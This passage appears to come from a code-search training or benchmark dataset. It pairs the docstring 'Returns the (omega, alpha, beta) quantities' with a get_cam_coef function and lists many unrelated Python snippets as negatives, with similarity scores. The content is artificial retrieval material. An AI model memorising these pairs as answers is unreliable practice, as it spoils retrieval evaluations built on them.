self.shipping_incl_tax - self.surcharge_incl_tax", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_hop_limit(self):\n return self.__hop_limit", "def _get_gs_energies(self):\n energy = []\n for ground_state in self._ground_states:\n gs_energy = 0.0\n for key in ground_state[\"eci\"].keys():\n gs_energy += ground_state[\"eci\"][key] * ground_state[\"cf\"][key]\n energy.append(len(ground_state[\"atoms\"]) * gs_energy)\n return energy", "def get_num_countries(self):\n return len(self.countries)", "def getSize(self):\n if self.sym != None:\n return self.sym.getSize()\n return self.define.getSize()", "def _get_count(self, msg, subtype=\"all\"):\n try:\n counts = self.get_local(msg, \"counts\")\n return counts.get(subtype, 0)\n except KeyError:\n return 0", "def _get_lymphocytes_to_exchange(self):\n self.lock_to_exchange.acquire()\n lymphocytes = self.to_exchange[:]\n self.lock_to_exchange.release()\n return lymphocytes", "def load(self):\n total = sum(self.connections.values())\n return total", "def get_TotalCount(self):\n return self._output.get('TotalCount', None)", "def num_attendees(self):\r\n n = sum([c.qty for c in self.contribution_set.all()])\r\n return n", "def bill_to_global_ultimate(self):\n return self._bill_to_global_ultimate", "def count(self) -> float:\n return pulumi.get(self, \"count\")", "def get_total_stateless(db):\n pass", "def get_usage(self):\n res = self.conn.get_send_quota()\n res = res['GetSendQuotaResponse']\n result = res['GetSendQuotaResult']\n quota = float(result['Max24HourSend'])\n sent = float(result['SentLast24Hours'])\n return sent, quota", "def Available(self) -> int:", "def Available(self) -> int:", "def Available(self) -> int:" ]
[ "0.6179084", "0.57443017", "0.5690381", "0.54959685", "0.5471419", "0.5430132", "0.54086834", "0.5376728", "0.53472584", "0.532548", "0.52933073", "0.5260959", "0.52479035", "0.52417845", "0.5236068", "0.52341425", "0.52264065", "0.5225553", "0.5212044", "0.5207183", "0.5192774", "0.518821", "0.518764", "0.51840156", "0.51670605", "0.5164562", "0.51516145", "0.5148122", "0.51471496", "0.5143264", "0.5139769", "0.5132549", "0.5129987", "0.5125984", "0.5110891", "0.51014894", "0.51001084", "0.50905025", "0.508993", "0.5087617", "0.5083241", "0.5073377", "0.5072414", "0.50688523", "0.50685656", "0.5067115", "0.50627816", "0.5058083", "0.5048163", "0.5038236", "0.5030739", "0.50266826", "0.50214565", "0.50207716", "0.5014149", "0.5005501", "0.5005277", "0.49967915", "0.49957305", "0.49895945", "0.49842456", "0.49832517", "0.49770746", "0.4972596", "0.49688807", "0.49623066", "0.49573606", "0.49551457", "0.49529678", "0.49522686", "0.49510276", "0.49431205", "0.4935329", "0.49282494", "0.49162376", "0.49128398", "0.49118268", "0.49101573", "0.4907047", "0.49057028", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.48975876", "0.4895614", "0.48921847", "0.48895893", "0.48833525", "0.48822415", "0.4881435", "0.48806214", "0.48798096", "0.4879462", "0.4876635", "0.48744243", "0.48734692", "0.48703638", "0.48703638", "0.48703638" ]
0.0
-1
Returns the (omega, alpha, beta) quantities
def get_cam_coef(self):
    if self._family not in [flags.XC_FAMILY_HYB_LDA, flags.XC_FAMILY_HYB_GGA, flags.XC_FAMILY_HYB_MGGA]:
        raise ValueError("get_cam_coef can only be called on hybrid functionals.")

    if not self._have_cam:
        raise ValueError("get_cam_coef can only be called on range-separated functionals.")

    return (self._cam_omega, self._cam_alpha, self._cam_beta)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def quantities():\n # publish the modules\n return (\n SI,\n angle, area, energy, force, length, mass, power, pressure,\n speed, substance, temperature, time, volume\n )", "def omega(self):\n return self._omega", "def getParam(self):\n return self.__alpha0, self.__alpha1, self.__beta, self.__eta", "def getBoxBetaAndDimensions(self):\n beta=float(self._raw_data[\"BOX_DIMENSIONS\"][0])\n x=float(self._raw_data[\"BOX_DIMENSIONS\"][1])\n y=float(self._raw_data[\"BOX_DIMENSIONS\"][2])\n z=float(self._raw_data[\"BOX_DIMENSIONS\"][3])\n return (units.Quantity(beta, units.degree),\n units.Quantity(x, units.angstrom),\n units.Quantity(y, units.angstrom),\n units.Quantity(z, units.angstrom))", "def get_omega(num_sys=1):\n return 2.0*np.pi*uniform(size = num_sys)", "def omega ( self ) :\n from GaudiConfUtils.ConfigurableGenerators import DaVinci__N3BodyDecays \n ##\n pre_omega = self.make_selection (\n ## the unique tag \n 'PreOmega' ,\n ## algorithm type to be used\n DaVinci__N3BodyDecays ,\n ## input selections \n [ self.pions () , self.pi0 () ] ,\n ##\n DecayDescriptor = \" omega(782) -> pi+ pi- pi0\" ,\n ## \n Combination12Cut = \"\"\" ( AM < 1 * GeV ) &\n ( ACHI2DOCA(1,2) < 12 ) \n \"\"\" ,\n ## \n CombinationCut = \"\"\"\n ( APT > %s ) & ( ADAMASS ( 'omega(782)' ) < 100 * MeV )\n \"\"\" % ( 0.9 * self['OMEGA_PT'] ),\n ##\n MotherCut = \"\"\"\n ( PT > %s ) &\n ( chi2vx < 9 )\n \"\"\" % self['OMEGA_PT']\n )\n \n from GaudiConfUtils.ConfigurableGenerators import Pi0Veto__Tagger2g\n ## \n return self.make_selection (\n 'Omega' ,\n Pi0Veto__Tagger2g ,\n [ pre_omega ] ,\n MassWindow = 25 * MeV ,\n MassChi2 = -1 ,\n ExtraInfoIndex = 25019 ## unique ! \n )", "def calculateGammaFactors(self):\n return (self.time/self.expectedDuration)**self.beta", "def Q_term(\n omega1, # vorticity-1 component\n omega2, # vorticity-2 component\n omega3, # vorticity-3 component\n s11, # strain rate-11 component\n s12, # strain rate-12 component\n s13, # strain rate-13 component\n s22, # strain rate-22 component\n s23, # strain rate-23 component\n s33): # strain rate-33 component\n #---------------------------------------------------------------------#\n # Numerator and denominator #\n #---------------------------------------------------------------------#\n num = omega1*s11*omega1 + omega1*s12*omega2 + omega1*s13*omega3 +\\\n omega2*s12*omega1 + omega2*s22*omega2 + omega2*s23*omega3+\\\n omega3*s13*omega1 + omega3*s23*omega2 + omega3*s33*omega3\n den1 = omega1*omega1 + omega2*omega2 + omega3*omega3\n den2 = (s11*s11 + s12*s12 + s13*s13 + s12*s12 + s22*s22 + s23*s23 +\\\n s13*s13 + s23*s23 + s33*s33)**0.5\n den = ((2.0/3.0)**0.5)* den1 * den2\n #---------------------------------------------------------------------#\n # Q calculation #\n #---------------------------------------------------------------------#\n Q = num/den\n\n return Q", "def beta(self):\n eTheta = self.eTheta()\n cosOmg = np.cos(self.omega())\n return self.a1()/c.c*(1-eTheta**2)**0.5*cosOmg", "def estimate(self, x, want_alpha=False, **args):\n N = len(x)\n # \\hat{alpha}: p(z_n | x_1, ..., x_n)\n alpha = np.zeros([N, self._K], float)\n alpha[0] = self._i * self._e[x[0]]\n alpha[0] /= alpha[0].sum()\n beta = np.zeros([N, self._K], float)\n beta[-1] = 1.0\n c = np.zeros([N], float)\n c[0] = alpha[0].sum()\n # Calculate Alpha\n for n in range(1, N):\n a = self._e[x[n]] * np.dot(alpha[n -1], self._t)\n c[n] = a.sum()\n alpha[n] = a / c[n]\n if want_alpha:\n return alpha, c\n # Calculate Beta\n for n in range(N - 2, -1, -1):\n beta[n] = np.dot(beta[n + 1] * 
self._e[x[n + 1]], self._t.T) / c[n + 1]\n gamma = alpha * beta\n xisum = sum(\n np.outer(alpha[n-1], self._e[x[n]] * beta[n]) / c[n] for n in range(1, N)\n ) * self._t\n return gamma, xisum, c", "def omega(self):\n return self._data.train_X @ self._thetas", "def big_analysis(beta0s=[0.5, 0.8, 1.1, 1.4, 1.7], ks=range(6), betaps=[1.2, 1.5, 2, 3]):", "def stats(self):\n nqbits = self.operator.num_qubits", "def nbetas(self):\n return sum(self.beta)", "def get_alpha_beta(self,n=50):\n return self.tau(self.f0(self.rho),n),self.tau_plus(self.f1(self.rho),n)", "def omega(self):\n self.cosineSequences()", "def omega(self):\n return [coset for coset in range(len(self.p)) if self.p[coset] == coset]", "def num_particles(self) -> Tuple[int, int]:\n return (self.num_alpha, self.num_beta)", "def get_omega(\n inequalities: List[Relational], n_bits: int, p: int = 10, as_numeric: bool = False\n) -> Matrix:\n n_vars = len(DEPENDENTS) + len(inequalities)\n q = qe.get_bit_map(n_vars=n_vars, n_bits=n_bits)\n a, b = qe.constraints_to_matrix(\n inequalities, dependents=DEPENDENTS, as_numeric=as_numeric\n )\n omega = -p * qe.get_constrained_matrix(q, a, b, as_numeric=as_numeric)\n nx = len(DEPENDENTS) * n_bits\n omega[:nx, :nx] += get_omega_0(n_bits, as_numeric=as_numeric)\n return omega", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha, beta):\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def B(alpha: float, beta: float) -> float:\n return math.gamma(alpha) * math.gamma(beta) / math.gamma(alpha + beta)", "def _get_alpha_beta(self):\n alpha = tf.nn.softplus(self.alpha_prime)\n beta = -alpha + tf.nn.softplus(self.beta_prime)\n return alpha, beta", "def quantum_theta(self):\n return quantum_theta(self.T_e, self.n_e)", "def getETA():", "def getETA():", "def test_calculate_basic_property_terms():\n X = 100\n delta_beta = 1.0\n rho = np.ones(X)\n g = np.ones(X)\n g_plus = np.ones(X) + 1\n g_minus = np.ones(X)\n\n ret = st.calculate_basic_property_terms(delta_beta, rho, g, g_plus, g_minus)\n\n assert np.all(ret[0] == g / rho)\n assert np.all(ret[1] == 0.5)\n assert np.all(ret[2] == 1.0)\n return", "def orderparameter(x, Tc=100, beta=0.5, amp=1):\n # op = amp*np.real(np.power(np.complex(Tc-x),beta))\n op = amp * np.power(Tc - x, beta)\n op[np.isnan(op)] = 0.0\n return op", "def zeta(self):\r\n raise NotImplementedError('not implemented yet')", "def gen_omega(costheta0, phi0, costheta1, phi1):\n global pgamma\n pgamma = [TLorentzVector(), TLorentzVector(), TLorentzVector()]\n q_omega = (m_omega**2 - m_pi0**2) / (2 * m_omega)\n sintheta1 = sqrt(1 - costheta1*costheta1)\n pgamma[0].SetXYZT(q_omega * sintheta1 * math.cos(phi1),\n q_omega * sintheta1 * math.sin(phi1),\n q_omega * costheta1, q_omega)\n q_pi0 = m_pi0 / 2\n sintheta0 = sqrt(1 - costheta0**2)\n pgamma[1].SetXYZT(q_pi0 * sintheta0 * math.cos(phi0),\n q_pi0 * sintheta0 * math.sin(phi0),\n q_pi0 * costheta0, q_pi0)\n pgamma[2].SetXYZT(-q_pi0 * sintheta0 * math.cos(phi0),\n -q_pi0 * sintheta0 * math.sin(phi0),\n -q_pi0 * costheta0, q_pi0)\n beta = pgamma[0].Vect() * (1 / math.sqrt(q_omega**2 + m_pi0**2))\n pgamma[1].Boost(-beta)\n pgamma[2].Boost(-beta)\n global pomega\n pomega = pgamma[0] + pgamma[1] + pgamma[2]\n return pomega", "def ex1_get(alpha,beta,pace,delta):\n\t\n\tfilename = seed+\"/ex_sim_a\"+str(alpha)+\"_p\"+str(pace)+\"_d\"+str(delta)+\".tmp\"\n\t\t\n\t# get the 
avg_energy vector\n\tavg_energy = [0]*(T+1)\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tfile.readline() # the first line contains T\n\t\tfor t in range(T+1):\n\t\t\te_t = float(file.readline().split()[0]) # e_t is the 1st value\n\t\t\tavg_energy[t] += e_t/K\n\n\treturn avg_energy", "def B(alpha, beta):\n return math.gamma(apha) * math.gamma(beta) / math.gamma(alpha + beta)", "def curve_to_q(beta,mode='O'):\n n, T = beta.shape\n v = gradient(beta, 1. / (T - 1))\n v = v[1]\n\n q = zeros((n, T))\n lenb = sqrt(innerprod_q2(v,v))\n for i in range(0, T):\n L = sqrt(norm(v[:, i]))\n if L > 0.0001:\n q[:, i] = v[:, i] / L\n else:\n q[:, i] = v[:, i] * 0.0001\n\n lenq = sqrt(innerprod_q2(q,q))\n q = q / lenq\n \n if mode == 'C':\n q = project_curve(q)\n\n return (q, lenb, lenq)", "def nbeta(self) -> int:\n return self._core.nbeta()", "def omega_cyclotron(q, B, mass):\n return q * cgs.e * B / (mass * cgs.c)", "def M_ver(seq):\r\n num_AB = 0\r\n num_AnotB = 0\r\n num_BnotA = 0\r\n for item in seq:\r\n if np.array_equal(item, Quantifier.AB):\r\n num_AB += 1\r\n if np.array_equal(item, Quantifier.AnotB):\r\n num_AnotB += 1\r\n if np.array_equal(item, Quantifier.BnotA):\r\n num_BnotA += 1\r\n return (Quantifier.T if num_AB + num_AnotB > num_AB + num_BnotA\r\n else Quantifier.F)", "def get_etaZ(self, J, beta=0.0):\n # mu_0 hbar / 4_pi = hbar* 10^-7\n fact = -1.0545718e-41*self.gH.gamma*self.gX.gamma**2.0*(self.rXH*self.dist_fact)**-3.0 * self.B_0*self.gX.csa* 0.4\n return fact*(1.5*cos(beta)-0.5)*J[iOmX]", "def ex_sim_get(alpha,beta,pace,delta): \n\t\n\tfilename = seed+\"/ex_sim_a\"+str(alpha)+\"_p\"+str(pace)+\"_d\"+str(delta)+\".tmp\"\n\t\n\t# get the avg_energy and avg_overlap\n\tavg_energy = 0\n\tavg_overlap = 0\n\t\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tdata = file.readline().split()\n\t\te_T,q_T = float(data[0]),float(data[1])\n\t\tavg_energy += e_T/K\n\t\tavg_overlap += q_T/K\n\t\n\treturn avg_energy, avg_overlap", "def Omega(z, x, beta2):\n \n nu0 = nu(x, beta2)\n zeta0 = zeta(z, x, beta2)\n \n temp = (eta(z, x, beta2)**2/16\n - zeta0 * nu0/6\n + nu0**3/216)\n return temp + sqrt(temp**2 - (zeta0/3 + nu0**2/36)**3)", "def tvalues(self):\n return self.params / self.bse", "def tvalues(self):\n return self.params / self.bse", "def generate_omega_data(*args):\n if len(args) == 2:\n return generate_omega(args[0], args[1])\n else:\n return generate_biased_omega(args[0], args[1], args[2])", "def _momentum_unit(eq):\n mp=1.66e-27; A=2;\n q=1.602e-19; Z=1\n B = np.abs(eq.B0EXP)\n R = eq.R0EXP\n\n mom_unit= Z*q*B*R**2 #pphi=pphi[SI]*pphi_unit\n energy_unit = mp*A/(Z*Z*q*q*R**2*B**2) #E=E[J]*energy_unit\n mu_unit = mp*A/(Z*Z*q*q*R**2*B) #mu=mu[SI]*mu_unit\n return mom_unit, energy_unit, mu_unit", "def _quant(self, input):\n quant_input = self._input_quantizer(input)\n quant_weight = self._weight_quantizer(self.weight)\n\n return (quant_input, quant_weight)", "def _quant(self, input):\n quant_input = self._input_quantizer(input)\n quant_weight = self._weight_quantizer(self.weight)\n\n return (quant_input, quant_weight)", "def _get_parameters(n, j, domain, g, ncap):\n alphas, betas = rc.recurrenceCoefficients(n - 2, lb=domain[0], rb=domain[1],\n j=j, g=g, ncap=ncap)\n omegas = g * np.array(alphas)\n ts = g * np.sqrt(np.array(betas)[1::])\n c0 = np.sqrt(betas[0])\n return omegas, ts, c0", "def getEta(self):\n self.__eta = 3./8.*(1. - self.__alpha0 - self.__alpha1 - 2.*self.__beta)\n if self.__eta<0.: self.__eta=0. 
# erreur d'arrondi\n return self.__eta", "def lattice_parameters(self):\n return self.a, self.b, self.c, self.alpha, self.beta, self.gamma", "def t99(B, alpha):\n\n Q = 2*scc.pi*(1+alpha**2)/scc.physical_constants['electron gyromag. ratio'][0]\n return (((Q/B)**2)/(1-0.99**2))**0.5", "def Qps(self):\n return [elem['Qp'] for elem in self.__compartments]", "def omega_c(B, m=m_star, q=q_e):\n return q * B / m # in 1/s", "def getOmega(dels):\n N = dels.delta_d.shape[1]\n delta_t = dels.delta_t\n delta_d = dels.delta_d\n \n a_t = np.diff(delta_t)\n a_t = a_t[:,0:-1]\n \n a_d = np.diff(delta_t[:,::-1])\n a_d = a_d[:,::-1]\n a_d = a_d[:,1::]\n \n b_t = np.diff(delta_d)\n b_t = b_t[:,0:-1]\n \n b_d = np.diff(delta_d[:,::-1])\n b_d = b_d[:,::-1]\n b_d = b_d[:,1::] \n \n c_t = 0.25*(np.abs(a_t)+np.abs(b_t))*np.sign(a_t)*np.sign(b_t)*(np.sign(a_t)*np.sign(b_t)-1)\n c_d = 0.25*(np.abs(a_d)+np.abs(b_d))*np.sign(a_d)*np.sign(b_d)*(np.sign(a_d)*np.sign(b_d)-1)\n Omega = 1.0/(2*N)*(c_t.mean(axis=0) + c_d.mean(axis=0))\n\n return Omega", "def _determine_omega_vector(syslist, omega_in, omega_limits, omega_num,\n Hz=None, feature_periphery_decades=None):\n omega_range_given = True\n\n if omega_in is None:\n if omega_limits is None:\n omega_range_given = False\n # Select a default range if none is provided\n omega_out = _default_frequency_range(\n syslist, number_of_samples=omega_num, Hz=Hz,\n feature_periphery_decades=feature_periphery_decades)\n else:\n omega_limits = np.asarray(omega_limits)\n if len(omega_limits) != 2:\n raise ValueError(\"len(omega_limits) must be 2\")\n omega_out = np.logspace(np.log10(omega_limits[0]),\n np.log10(omega_limits[1]),\n num=omega_num, endpoint=True)\n else:\n omega_out = np.copy(omega_in)\n\n return omega_out, omega_range_given", "def _q_z(self):\n D = self.latt_par['D'].value\n lambda_r = self.latt_par['lambda_r'].value\n gamma = self.latt_par['gamma'].value\n return 2*np.pi*(self.h/D - self.k/lambda_r/np.tan(gamma))", "def betas_for_alpha_bar(num_diffusion_timesteps, alpha_bar, max_beta=0.999):\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return np.array(betas)", "def getMagnitudes(self):\n return self._bmag, self._vmag, self._jmag, self._hmag, self._kmag", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = (a + 1) - (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha\n a1 = -(2 * ((a - 1) - (a + 1) * np.cos(w0))) / a0\n a2 = -((a + 1) - (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha) / a0\n\n b0 = (a * ((a + 1) + (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha)) / a0\n b1 = (-2 * a * ((a - 1) + (a + 1) * np.cos(w0))) / a0\n b2 = (a * ((a + 1) + (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha)) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def comp_beta(m1=database['pi+'].mass, m2=database['K+'].mass, p=75):\r\n b1 = beta(p, m1)\r\n b2 = beta(p, m2)\r\n db = abs(b1 - b2)\r\n if np.log10(db) < -2:\r\n disp_db = db*10**(-round(np.log10(db)))\r\n text1 = 'dBeta = {0:.3f}e-0{1:.0f}, '.format(disp_db, -round(np.log10(db)))\r\n else:\r\n text1 = 'dBeta = {0:.3f}, '.format(db)\r\n t1_per_m = 1/(b1*c)\r\n t2_per_m = 1/(b2*c)\r\n if t1_per_m > t2_per_m:\r\n rt = 1 - (t2_per_m/t1_per_m)\r\n else:\r\n rt = 1 - (t1_per_m/t2_per_m)\r\n if np.log10(rt) < -2:\r\n disp_rt = rt*10**(-round(np.log10(rt)))\r\n text3 = ', rt = {0:.3f}e-0{1:.0f}'.format(disp_rt, 
-round(np.log10(rt)))\r\n else:\r\n text3 = ', rt = {0:.3f}'.format(rt)\r\n dt_per_m = abs(t1_per_m-t2_per_m)\r\n if np.log10(dt_per_m) >= -1:\r\n text2 = 'dt = {0:.3f} s'.format(dt_per_m)\r\n if np.log10(dt_per_m) < -1 and np.log10(dt_per_m) >= -4:\r\n text2 = 'dt = {0:.3f} ms'.format(dt_per_m*1e3)\r\n if np.log10(dt_per_m) < -4 and np.log10(dt_per_m) >= -7:\r\n text2 = 'dt = {0:.3f} microns'.format(dt_per_m*1e6)\r\n if np.log10(dt_per_m) < -7 and np.log10(dt_per_m) >= -10:\r\n text2 = 'dt = {0:.3f} ns'.format(dt_per_m*1e9)\r\n if np.log10(dt_per_m) < -10:\r\n text2 = 'dt = {0:.3f} ps'.format(dt_per_m*1e12)\r\n return text1+text2+text3", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = (a + 1) + (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha\n a1 = -(-2 * ((a - 1) + (a + 1) * np.cos(w0))) / a0\n a2 = -((a + 1) + (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha) / a0\n\n b0 = (a * ((a + 1) - (a - 1) * np.cos(w0) + 2 * np.sqrt(a) * alpha)) / a0\n b1 = (2 * a * ((a - 1) - (a + 1) * np.cos(w0))) / a0\n b2 = (a * ((a + 1) - (a - 1) * np.cos(w0) - 2 * np.sqrt(a) * alpha)) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def components(self):\n return self._proportional, self._integral, self._derivative", "def get_characteristic_vals(self):\n\n # Characteristic quantity of x\n x = scutils.qv2x(self.dyn_sys.tpwl_dict['q'], self.dyn_sys.tpwl_dict['v'])\n x_char = np.abs(x).max(axis=0)\n\n # Characteristic quantity of the dynamics f\n f = np.zeros(x.shape)\n for i in range(x.shape[0]):\n f[i, :], _, _ = self.get_continuous_dynamics(x[i, :], self.dyn_sys.tpwl_dict['u'][i, :])\n f_char = np.abs(f).max(axis=0)\n\n return x_char, f_char", "def biquad_coefficients(self):\n a = 10 ** (self.gain / 40)\n w0 = 2 * np.pi * self.fc / self._fs\n alpha = np.sin(w0) / (2 * self.q)\n\n a0 = 1 + alpha / a\n a1 = -(-2 * np.cos(w0)) / a0\n a2 = -(1 - alpha / a) / a0\n\n b0 = (1 + alpha * a) / a0\n b1 = (-2 * np.cos(w0)) / a0\n b2 = (1 - alpha * a) / a0\n\n return 1.0, a1, a2, b0, b1, b2", "def params(self):\n return [cq.Symbol('theta_0')]", "def num_beta(self) -> int:\n return self._num_beta", "def gamma_param_estimate(mu,sigma):\n k = (mu/sigma)**2\n theta = sigma**2/mu\n\n return k,theta", "def compute_t_params(mu, kappa, alpha, beta):\r\n mu_, sigma2_, dof_ = mu, beta*(kappa + 1)/(alpha*kappa), 2*alpha\r\n return mu_, sigma2_, dof_", "def VarianceOfAbsAcceleration(self):\n H = []\n for i in range(len(self.omega_range)):\n \"\"\"Calculation of the Transmission matrix H\"\"\"\n H.append(np.linalg.inv((-self.omega_range[i] ** 2 * self.M\n - 1j * self.omega_range[i] * self.C\n + self.K)))\n \"\"\"squared absolute of the transmission matrix H multiplied with the diagonal of the mass matrix M (M*I)\"\"\"\n FRFacc = [H[wincr].dot(np.diagonal(self.M)) * self.omega_range[wincr] ** 2 for wincr in\n range(len(self.spectrum))]\n Habs2 = [(np.abs(np.ones(len(vector), dtype=float) - vector) ** 2) for vector in FRFacc]\n PSDexc = self.spectrum\n \"\"\"Response of all DOFs as PSD\"\"\"\n RespPSD = [Habs2[wincr] * PSDexc[wincr] for wincr in range(len(self.spectrum))]\n AccPSD = [abs(RespPSD[wincr] + 0*PSDexc[wincr]) for wincr in range(len(self.spectrum))]\n \"\"\"The variance of the response can be obtained with the integral of the response PSD. 
\n integral(PSD_response)\"\"\"\n variance = (np.trapz(AccPSD, self.omega_range, axis=0))\n return variance", "def get_phi_chi_omega(self, angles):\n (phi) = angles[0]\n chi = np.deg2rad(self.chi)\n omega = 0\n return (phi, chi, omega)", "def betas_for_alpha_bar(num_diffusion_timesteps, max_beta=0.999):\n\n def alpha_bar(time_step):\n return math.cos((time_step + 0.008) / 1.008 * math.pi / 2) ** 2\n\n betas = []\n for i in range(num_diffusion_timesteps):\n t1 = i / num_diffusion_timesteps\n t2 = (i + 1) / num_diffusion_timesteps\n betas.append(min(1 - alpha_bar(t2) / alpha_bar(t1), max_beta))\n return torch.tensor(betas, dtype=torch.float32)", "def get_units(self):\r\n msg = struct.pack('>2B', 56, 14)\r\n response = self.query(msg)\r\n\r\n if response[1] == 2:\r\n units = 'A'\r\n to_nm_multiplier = 1 / 10\r\n elif response[1] == 1:\r\n units = 'nm'\r\n to_nm_multiplier = 1\r\n elif response[1] == 0:\r\n units = 'um'\r\n to_nm_multiplier = 1000\r\n else:\r\n raise ValueError('Units not recognised.')\r\n\r\n # Save results locally too for quick re-use\r\n self._current_units = units\r\n self._current_to_nm_multiplier = to_nm_multiplier\r\n\r\n return units, to_nm_multiplier", "def get_etaXY(self, J, beta=0.0):\n fact = -1.0545718e-41*self.gH.gamma*self.gX.gamma**2.0*(self.rXH*self.dist_fact)**-3.0 * self.B_0*self.gX.csa* 0.4\n return fact/6.0*(1.5*cos(beta)-0.5)*( 4.0*J[0] + 3.0*J[iOmX] )", "def get_alpha_beta_bounds(self,n=50):\n rho_temp = self.rho\n self.rho = self.rho_max\n beta = self.tau_plus(self.f1(self.rho_max),n)\n self.rho = self.rho_min\n alpha = self.tau(self.f0(self.rho_min),n)\n self.rho = rho_temp\n return alpha,beta", "def _beta(self):\n return _handle_ab(self.solution, self.use_const)[1]", "def jarque_bera(self,alpha=0.05):\n self._finalize()\n JB = self.vcount/6*(self.vskewness**2 + 1/4*((self.vkurtosis-3)**2))\n if chi2 is None:\n p = \"scipy missing\"\n else:\n p = 1 - chi2.cdf(JB,2)\n return JB,p", "def quantum_volume(self):\n\n qv_list = 2**np.array(self._depths)\n\n return qv_list", "def getGamma(self, alpha, beta):\n return np.power(beta,2.0)/2.0/alpha", "def gather_qpt_info_me(self):\n if not self.active_worker:\n return None\n\n nqpt_me = len(self.my_iqpts)\n\n qred = np.zeros((nqpt_me, 3), dtype=np.float)\n omega = np.zeros((nqpt_me, 3 * self.natom), dtype=np.float)\n\n for i, iqpt in enumerate(self.my_iqpts):\n\n self.set_ddb(iqpt)\n qred[i,:] = self.qptanalyzer.qred[:]\n omega[i,:] = np.real(self.qptanalyzer.omega[:])\n\n return qred, omega", "def calculate(beta: int, alpha: int) -> int: # pragma: no cover\n if beta == 0:\n raise ArithmeticError(\"Cannot compute the discrete logarithm of 0 in a Galois field.\")\n\n r = len(FACTORS)\n n = ORDER - 1 # Order of the multiplicative group of GF(p^m), must be prime\n\n x = np.zeros(r, dtype=DTYPE)\n m = np.zeros(r, dtype=DTYPE)\n for i in range(r):\n q = FACTORS[i]\n e = MULTIPLICITIES[i]\n m[i] = q**e\n gamma = 1\n alpha_bar = POWER(alpha, n // q)\n l_prev = 0 # Starts as l_i-1\n q_prev = 0 # Starts as q^(-1)\n for j in range(e):\n gamma = MULTIPLY(gamma, POWER(alpha, l_prev * q_prev))\n beta_bar = POWER(MULTIPLY(beta, RECIPROCAL(gamma)), n // (q ** (j + 1)))\n l = BRUTE_FORCE_LOG(beta_bar, alpha_bar)\n x[i] += l * q**j\n l_prev = l\n q_prev = q**j\n\n return CRT(x, m)", "def get_Omega(num_sys=1):\n return 2.0*np.pi*uniform(size = num_sys)", "def ex2_3_get(alpha,beta,pace,delta): \n\t\n\tfilename = seed+\"/ex2_a\"+str(alpha)+\"_b\"+str(beta)+\".tmp\"\n\t\n\t# get the avg_energy and avg_overlap\n\tavg_energy = 
0\n\tavg_overlap = 0\n\t\n\tfile = open(filename,'r')\n\tfor _ in range(K):\n\t\tdata = file.readline().split()\n\t\te_T,q_T = float(data[0]),float(data[1])\n\t\tavg_energy += e_T/K\n\t\tavg_overlap += q_T/K\n\t\n\treturn avg_energy, avg_overlap", "def get_val_params(sigma, alpha):\n if len(sigma) == 2:\n sigma_val = [(sigma[0] + sigma[1]) / 2]\n elif len(sigma) == 1:\n sigma_val = sigma\n else:\n raise RuntimeError('Invalid sigma length = {}'.format(len(sigma)))\n\n if len(alpha) == 2:\n alpha_val = [(alpha[0] + alpha[1]) / 2]\n elif len(alpha) == 1:\n alpha_val = alpha\n else:\n raise RuntimeError('Invalid alpha length = {}'.format(len(alpha)))\n\n return sigma_val, alpha_val", "def _quantile_function(self, alpha=0.5, smallest_count=None):\n clean, total = self._prepare_for_stats()\n if not total:\n return lambda q: None\n\n smallest_observed_count = min(clean.values())\n if smallest_count is None:\n smallest_count = smallest_observed_count\n else:\n smallest_count = min(smallest_count, smallest_observed_count)\n\n beta = alpha * smallest_count\n\n debug_plot = []\n cumulative_sum = 0.0\n inverse = sortedcontainers.SortedDict()\n for value, count in clean.items():\n debug_plot.append((cumulative_sum / total, value))\n inverse[(cumulative_sum + beta) / total] = value\n cumulative_sum += count\n inverse[(cumulative_sum - beta) / total] = value\n debug_plot.append((cumulative_sum / total, value))\n\n # get maximum and minumum q values\n q_min = inverse.keys()[0]\n q_max = inverse.keys()[-1]\n\n # this stuff if helpful for debugging -- keep it in here\n # for i, j in debug_plot:\n # print i, j\n # print ''\n # for i, j in inverse.items():\n # print i, j\n # print ''\n\n def function(q):\n\n if q < 0.0 or q > 1.0:\n msg = \"invalid quantile {}, need `0 <= q <= 1`\".format(q)\n raise ValueError(msg)\n elif q < q_min:\n q = q_min\n elif q > q_max:\n q = q_max\n\n # if beta is\n if beta > 0:\n if q in inverse:\n result = inverse[q]\n else:\n previous_index = inverse.bisect_left(q) - 1\n x1 = inverse.keys()[previous_index]\n x2 = inverse.keys()[previous_index + 1]\n y1 = inverse[x1]\n y2 = inverse[x2]\n result = (y2 - y1) * (q - x1) / float(x2 - x1) + y1\n\n else:\n if q in inverse:\n previous_index = inverse.bisect_left(q) - 1\n x1 = inverse.keys()[previous_index]\n x2 = inverse.keys()[previous_index + 1]\n y1 = inverse[x1]\n y2 = inverse[x2]\n result = 0.5 * (y1 + y2)\n else:\n previous_index = inverse.bisect_left(q) - 1\n 